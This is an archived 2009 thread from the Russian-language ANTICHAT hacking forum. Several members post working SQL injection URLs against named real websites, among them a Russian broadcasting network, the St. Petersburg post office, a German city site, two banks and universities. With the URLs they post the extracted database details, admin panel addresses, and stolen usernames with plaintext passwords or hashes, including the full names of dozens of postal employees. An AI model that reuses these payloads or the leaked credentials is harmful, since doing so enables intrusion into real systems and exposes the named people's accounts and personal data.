ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.04.2009, 23:17
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Федеральное Государственное Унитарное Предприятие "Российская Телевизионная и Радиовещательная Сеть"
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+@@version)
Код:
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+system_user )
Код:
Conversion failed when converting the nvarchar value 'frontcontent' to data type int.
Проверил все таблы
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+table_name+ from+information_schema.tables+where+table_name
+not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_37','SITE','SYSTEM_VARS','USER_RIGHTS','CONTENT_ TYPE','CON
TENT_TYPE','CONTENT_10','test1','PAGE','SITE_LANG' ,'TEMPLATE','CONTENT_68','ATTRIBUTE_GROUP','CONTEN T','CONTEN
T_49','CONTENT_TYPE_LINK','CONTENT_ATTRIBUTE','CON TENT_LINK','CONTENT_DATA','CONTENT_11','CONTAINER' ,'FORMAT',
'CONTENT_4','CONTENT_TYPE_GROUP','CONTENT_47','CON TENT_12','CONTENT_57','ROLE','USER_ROLE','CONTENT_ 42','CONTE
NT_71','GROUP_ROLE','ROLE_RIGHTS','SITE_SECTIONS', 'VIEWS','CONTENT_54','VIEW_CONTENT_TYPE','CONTENT_ 56','CONTE
NT_59','CONTENT_48','dtproperties','UNIT','CONTENT _13','CONTENT_44','CONTENT_73','CONTENT_65','CONTE NT_16','CO
NTENT_38','UNIT_SETTING','CONTENT_51','CONTENT_43' ,'CONTENT_52','CONTENT_2','CONTENT_55','CONTENT_46 ','CONTENT
_3','CONTENT_67','CONTENT_19','CONTENT_39','CONTEN T_24','CONTENT_60','CONTENT_14','CONTENT_41','CONT ENT_20','C
ONTENT_45','CONTENT_15','CONTENT_63','CONTENT_5',' CONTENT_23','CONTENT_69','CONTENT_50','CONTENT_58' ,'CONTENT_
6','CONTENT_70','CONTENT_61','CONTENT_40','CONTENT _7','CONTENT_25','CONTENT_53','CONTENT_62','CONTEN T_66','CON
TENT_8','CONTENT_36','ATTRIBUTE_TYPE','CONTENT_72' ,'CONTAINER_TYPE','CONTENT_17','CONTENT_STATUS','D B_VERSION'
,'LANGUAGE','OBJECT','SYSTEM_VARS_GROUP','CONTENT_ 9','USERS','USER_GROUP','BACKEND_SECTION','CONTENT _64'))
Понравилась только users
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+column_name +from+information_schema.columns+where+table_name= 'users'+and+column_name+like+'%login%')
Код:
Conversion failed when converting the nvarchar value 'login' to data type int.
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+column_name +from+information_schema.columns+where+table_name= 'users'+and+column_name+like+'%pass%')
Код:
Conversion failed when converting the nvarchar value 'password' to data type int.
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+login+from+ users)
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+password+fr om+users+where+login='fc_admin')
frontier
В итоге вот все юзеры:
Код:
fc_admin:frontier
rtrs-editor:VMc2r7k
dmitry:karakyli
ivelum_KVP:D7KAK8I
ivelum_LPP:0XEzzv
BolotovaE:HarryPotter
ivelum_YME:moscow5
ivelum_mcsim:M2CRqk3X
rtrs-Olga:HttfR76m0b
Val:
Sob:qwertyui
От чего юзеры незнаю,т.к. нашел только форум и webmail на сайте.
Последний раз редактировалось ILYAtirtir; 19.04.2009 в 23:22..
|
|
|
20.04.2009, 00:39
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
http://www.selvaelettrica.com/release_detail.php?id=-14+union+select+1,2,3,4,5,6,7--
Database Version: 4.1.24-standard-log
Database name: Sql78767_1
User name: Sql78767@62.149.141.75
http://melbourne.wireless.org.au/news?id=-1+union+select+1,2,3,4,5--
Database Version: 5.0.45
Database name: melbwireless
User name: melbwireless@localhost
Вытаскивать из phpbb_users
Login: admin
Pass: 72962abe4c51edd08b7a1c299a327994 : ???
Админка:
http://melbourne.wireless.org.au/admin/
|
|
|
|
20.04.2009, 14:34
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
bankofasia.com.np
Database Version: 4.1.22
Database name: bankofasiadb
User name: bankofasiausr@localhost
Код:
http://www.bankofasia.com.np/news-events/newsDetails.php?id=-16+union+Select+1,2,3,concat(username,0x3a,password),5,6,7+from+login
bankofthejames.com
Database Version: 5.0.75
Database name: bankofthejames
User name: botjWeb1@205.178.145.65
Код:
http://www.bankofthejames.com/news.php?id=-29+union+Select+1,2,3,4,5,6,7,concat(username,0x3a,password),9,0,1,2+from+cms_users
greenroofs.com
Database Version: 4.0.27-standard
Database name: db207579874
User name: dbo207579874@localhost
Код:
http://www.greenroofs.com/projects/pview.php?id=-663+union+select+1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users
rbeurope.org
Database Version: 5.0.70
Database name: bazaerb7
User name: bazaerb7@localhost
Код:
http://www.rbeurope.org/afiseaza.php?id=-32+union+select+1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+users+limit+1,1
|
|
|
|
20.04.2009, 15:39
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
rsc.ca
SQL -
Код:
http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,2,3,4,5+--+
Инклуд(3 символа=\ варианта нет) в 3 поле и вывод во 2...
Код:
http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5+--+
rsc@localhost:rsc:4.0.27
|
|
|
|
20.04.2009, 15:54
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://oyuniitulga.mn/index.php?com=news&catid=1&newsid=24+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10+limit+1,1
version():5.0.67.d7-ourdelta-log
database():dbotulga
user():dbotulga@72.167.232.53 |
|
|
|
20.04.2009, 19:50
|
|
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497
Репутация:
10
|
|
site: (http://www.blackknight.ca)
SQL -
Код:
http://www.blackknight.ca
/products.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
dbm.blackknight.ca@216.251.35.193 : website_en_blackknight_ca : 4.0.27-standard
Код:
http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Admin (table : user)
admin:4dm1n
Код:
http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),concat(login,0x3a,passwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users--
|
|
|
|
20.04.2009, 21:03
|
|
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208
Репутация:
94
|
|
http://www.ssmu.edu.ge уязвим для sql-injection
http://www.ssmu.edu.ge/t.php?lang=eng&id=5%27+and+0+union+select+1,2,3,4, 5,concat_ws(0x3a,user,password),7,8,9+from+user+li mit+0,1+--+
Список пользователей и их паролей.
Версия БД: 4.1.22-standard-log
Имя БД: ssmuedug_ssmu
Пользователь БД: ssmuedug_ssmu@localhost
Доступа к mysql.user нет. Прав на чтения файлов нет. information_schema нет( в связи с версией БД)
|
|
|
|
21.04.2009, 00:37
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,name),4,5,6,7+from+users/*
ad-neWs.wixwiesbad
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,user),4,5,6,7+from+mysql. user/*
0b796e382db94bb6xroot
Database Version: 4.0.24
Database name: wiesbaden
User name: wiesbaden@localhost
и file_priv=Y
Последний раз редактировалось Rubaka; 21.04.2009 в 00:40..
Причина: +
|
|
|
|
21.04.2009, 01:54
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://old.hfm-detmold.de/eti/readnews.php?id=-1+union+all+select+0,1,concat(user_id,0x3a,username,0x3a,user_password),3,4,5,6+from+phpbb_users+limit+1,1--
Узнал через сайт пасс админа форума 
ид/юзер/пасс:
Код:
2:matthias:acbb7f96c230e9549ed3f8b7b191e519
Сам форум нахадится по урлу:
http://old.hfm-detmold.de/eti/phpBB2/
---------------------------
The End! |
|
|
|
21.04.2009, 04:39
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Почта Санкт-Петербурга и Ленинградской области
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(concat_ws(0x3a,database(),user(),version()), 0x71),0x71),null,null,null,null,null,null,null,nul l,null,null,null,null,null
Код:
<!--<h1>spbpost_db:spbpost@localhost:5.1.30</h1>-->
Очень хитрожопая скуля,ели добился вывода,выводит закрытую в комментарий поэтому смотреть в исходник страницы
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(table_name,0x71),0x71),null,null,null,null,n ull,null,null,null,null,null,null,null,null+from+i nformation_schema.tables+where+table_name+like+'%u ser%'+limit+1,1
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(column_name,0x71),0x71),null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name='users '+limit+x,1
Код:
username
password
fullname
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(concat_ws(0x3a,fullname,username,password),0 x71),0x71),null,null,null,null,null,null,null,null ,null,null,null,null,null+from+users
и через лимит:
Код:
УФПС - ВАСИЛЬЕВ Е. И.:eivasilev:5971581a61e98b89
УФПС - Верендякин Д. А.:daverendyakin:249619d82c53899e
УФПС - Денисенко А. И.:aidenisenko:4de93a382c1cefbd
УФПС - Казимирчак Н. Б.:nbkazimirchak:4133e8c4145182ea
УФПС - Квашко Н. В.:nvkvashko:56c61a2e1f8fcf6d:
УФПС - Кушнирова Д. К.:dkkushnirova:0cb70d5b6ee6a28d:
УФПС - Кушниров К. Д.:kdkushnirov:60073dec39882935:
УФПС - НОВИКОВА О. В.:ovnovikova:5ed106ab23566a7d
УФПС - СЕМЁНОВ С. А.:sasemenov:31228363100e514f
УФПС - СТЁПИН Е. Г.:egstepin:19bf3d905e058879
УФПС - ФИЛАНТ Ю. Н.:yunfilant:188a1ea044b9e97c:
УФПС - ХИБЛИНА Д. О.:dohiblina:7627ea600ca34984:
Моск - Белан А. В.:avbelan:56c61a2e1f8fcf6d
Моск - Зайцев В. Б.:vbzaicev:1558f95336ddc01a:
Моск - Зосимов А.А.:aazosimov:0cccf40a49afde1d
Московский - Колыхалов К.Г:kgkolihalov:48c0557a3364c17f:
Моск - Пахомов А.Е.:aepahomov:42b5c9c41cdde822:
Моск - Рыжов А.Ю.:ayurijov:42b5c9c41cdde822:
Петрогр - Захаров С.В.:svzaharov:74a467fd5f50ba32
Петрогр - Пантюхов Л.В.:lvpantyuhov:249619d82c53899e:
Петрогр - Гегелева О.Д.:odgegeleva:1b1bce234ccb7977:
Петрогр - Патрин С.В.:svpatrin:42b5c9c41cdde822:
Петрогр - Андреев Д.М.:dmandreev:42b5c9c41cdde822
Петрогр - Чебыкин Д.С.:dschebikin:360039a131e12ba4:
Красног - Стрекалов Е.С.:esstrekalov:74ab9fc96d996910:
Красног - Андреева О.Ю.:oyuandreeva:31228363100e514f:
Красног - Сапрыкн С.Г.:sgsaprikin:42b5c9c41cdde822:
Красног - Иванов А.П.:apivanov:42b5c9c41cdde822
Красног - Ковалёв И.В.:ivkovalev:42b5c9c41cdde822:
Красног - Власов А.В.:avvlasov:3945ee27485d1be7:
Красног - Бушкевич В.А:vabushkevich:5d4e81cd6a5cee2d:
Красног - Буланов Ю.В.:yuvbulanov:42b5c9c41cdde822:
Красног - Петров И.М.:impetrov:5419209c7109682d:
Краснос - Курдюмов В. О.:vokurdyumov:3c53f6f0259384e7:
Краснос - Филатов Е. Н.:enfilatov:10e71cf53618b80e:
Пушк - Войтов А.Г.:agvoitov:69e56291380af837:
Пушк - Королев К.А.:kakorolev:36e38078653714a2
Пушк - Васильев С.А.:savasilev:459d78f677e83e0e
Пушк - Бондарчук Г.С.:gsbondarchuk:49af13841472f1c9:
Сестрор - Выжлов А. Н.:anvijlov:7f11c3ed3c0215bc:
СПБПочт - Александрова А.Н.:analexandrova:343f43ab46a63bb3
СПБПочт - Байкова Г.Н.:gnbaykova:3841a56150fb0ffe
СПБПочт - Шелудяева Ю.А.:yuasheludyaeva:14e97246581da732:
СПБПочт - Макаров Д.В.:dvmakarov:00c36ac01f7eb0e4
СПБПочт - Лескович В.В.:vvleskovich:25bcc4d8285a70e6
СПБПочт - Сонина Л.И.:lisonina:1ebef14a0d5b88fa:
СПБПочт - Сергеев А.А.:aasergeev:440f30047bdce88f:
СПБПочт - Бакаева С.С.:ssbakaeva:5792afc75549b813:
СПБПочт - Семенова С.И.:sisemenova:05a25cd57ac0a70f:
СПБПочт - Крушкина О.И.:oikrushkina:37fda15d52021b47:
Инна Гайда:inna:best:
УФПС - Балалайкин А. А.:aabalalaykin:21ddb5210ad35254:
УФПС - РАСТЕГАЕВ Д. В.:dvrastegaev:68a4d8e470aad708:
Моск - Цвирко И.Н:incvirko:418d2e19518fd5a1:
Петрогр - Белов А.А.:aabelov:10b42b7c62952d6b:
Красног - Коренев К.А:kakorenev:56ef67c845d53402:
Краснос - Веселовский Д. А.:daveselovskiy:6450bf303fbef463:
Пушк - Скирда С.А.:saskirda:08803541792dd5a5:
Сестр - Заграничный Ю. Е.:yuezagranichiy:2981663432c7d6e8:
СПБПочт - Рыбак Н.В.:nvribak:5be14dc352d5cccb:
Андрей Гурский:andi:santitimes:
админка:http://spbpost.ru/admin/
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1233010){kind=avatar}
Похожие темы
Линейный вид
